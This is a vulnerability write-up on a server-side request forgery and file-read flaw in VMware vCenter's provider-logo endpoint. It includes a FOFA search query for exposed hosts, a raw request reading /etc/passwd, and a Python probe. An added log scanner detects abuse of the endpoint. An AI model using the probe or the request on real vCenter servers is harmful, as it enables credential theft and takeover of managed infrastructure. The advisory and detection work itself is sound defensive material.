VMware vCenter provider-logo SSRF vulnerability
1. Vulnerability overview
VMware vCenter Server is server and virtualization management software from VMware. It provides a centralized platform for managing VMware vSphere environments and automates the deployment and delivery of virtual infrastructure. The vCenter web UI exposes a provider-logo endpoint that fetches whatever resource is named in its url parameter without restricting the scheme or host (a server-side request forgery). Because the file:// scheme is accepted, the same endpoint yields arbitrary file read: a remote attacker who can reach an externally exposed vCenter console can read any file the service account can open, including vCenter configuration files that contain administrator credentials, and from there take control of the vCenter platform and the virtual machine clusters it manages.
2. Affected versions
- VMware vCenter (no specific build range is given here; confirm against the vendor advisory for your deployment)
3. Asset discovery
- FOFA: title="ID_VC_Welcome"
4. Reproduction
The url parameter is the SSRF sink. Send a request for the provider-logo with url set to a file:// path; on a vulnerable instance the response body contains the file. The browser headers below are optional and can be dropped; the request line is written as HTTP/1.1 so it can be replayed from a raw HTTP client, and Host must be set to the target.

GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd HTTP/1.1
Host: <vcenter-host>
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
accept-language: zh-CN,zh;q=0.9
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-fetch-user: ?1
sec-fetch-dest: document
sec-fetch-mode: navigate
accept-encoding: gzip, deflate, br, zstd
sec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
upgrade-insecure-requests: 1

A successful read returns a 200 whose body starts with the root entry of /etc/passwd (root:x:0:0:...). A 4xx, an empty body or an HTML error page means the endpoint is absent, patched or not reachable.
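The probe above, together with a matching detection, as an added example that is not part of the original write-up or of VMware's code. It assumes the endpoint path and the url parameter exactly as shown in the request; the hostnames, log lines and the "target is internal" heuristic are constructed for illustration. The probe function needs network access; the URL builder, response check and log scanner run offline.

```python
"""vCenter provider-logo SSRF / file-read: probe builder, response check, access-log detection."""
import ipaddress
import re
import ssl
import urllib.error
import urllib.parse
import urllib.request

# Endpoint from the write-up; the `url` query parameter is the SSRF sink.
PROVIDER_LOGO_PATH = "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"


def build_probe_url(base_url: str, target: str = "file:///etc/passwd") -> str:
    """Build the probe URL; `target` is whatever the vulnerable endpoint will fetch."""
    base = base_url.rstrip("/")
    return f"{base}{PROVIDER_LOGO_PATH}?{urllib.parse.urlencode({'url': target})}"


def looks_like_passwd(body: str) -> bool:
    """True if the response body is /etc/passwd: a root entry with uid 0 and gid 0."""
    return re.search(r"^root:[^:]*:0:0:", body, re.M) is not None


def probe(base_url: str, target: str = "file:///etc/passwd", timeout: int = 10,
          verify_tls: bool = False):
    """Send the probe and return (status, body). vCenter usually runs a self-signed
    certificate, so TLS verification is off by default (assumption for lab use)."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(build_probe_url(base_url, target),
                                 headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read().decode("utf-8", "replace")


# --- detection side: scan reverse-proxy / access logs for abuse of the endpoint ---
LOG_RE = re.compile(
    r'"(?:GET|POST) (?P<path>' + re.escape(PROVIDER_LOGO_PATH) + r'\?[^ "]*) HTTP/')


def is_internal_target(url: str) -> bool:
    """Heuristic: loopback, private, link-local (cloud metadata) or localhost hosts."""
    host = urllib.parse.urlsplit(url).hostname or ""
    if host == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local


def find_provider_logo_abuse(log_lines):
    """Return (line_number, url) for provider-logo requests whose url parameter uses a
    non-http(s) scheme (file://, gopher://, ...) or points at an internal host."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        query = urllib.parse.urlsplit(m.group("path")).query
        url = urllib.parse.parse_qs(query).get("url", [""])[0]
        scheme = urllib.parse.urlsplit(url).scheme.lower()
        if scheme not in ("http", "https") or is_internal_target(url):
            hits.append((n, url))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/'
    'provider-logo?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1823',
    '10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/'
    'provider-logo?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 311',
    '10.0.0.6 - - [12/Mar/2024:10:00:03 +0000] "GET /ui/vcav-bootstrap/rest/vcav-providers/'
    'provider-logo?url=https://cdn.example.com/logo.png HTTP/1.1" 200 4096',
    '10.0.0.7 - - [12/Mar/2024:10:00:04 +0000] "GET /ui/ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(build_probe_url("https://vc.example.com"))
    for line_no, url in find_provider_logo_abuse(SAMPLE_LOG):
        print(f"suspicious provider-logo fetch on log line {line_no}: {url}")
```

The log scanner flags both the file:// read from the write-up and an http:// fetch aimed at a cloud metadata address, while an ordinary external logo URL is left alone; tune is_internal_target to your own address ranges before deploying it.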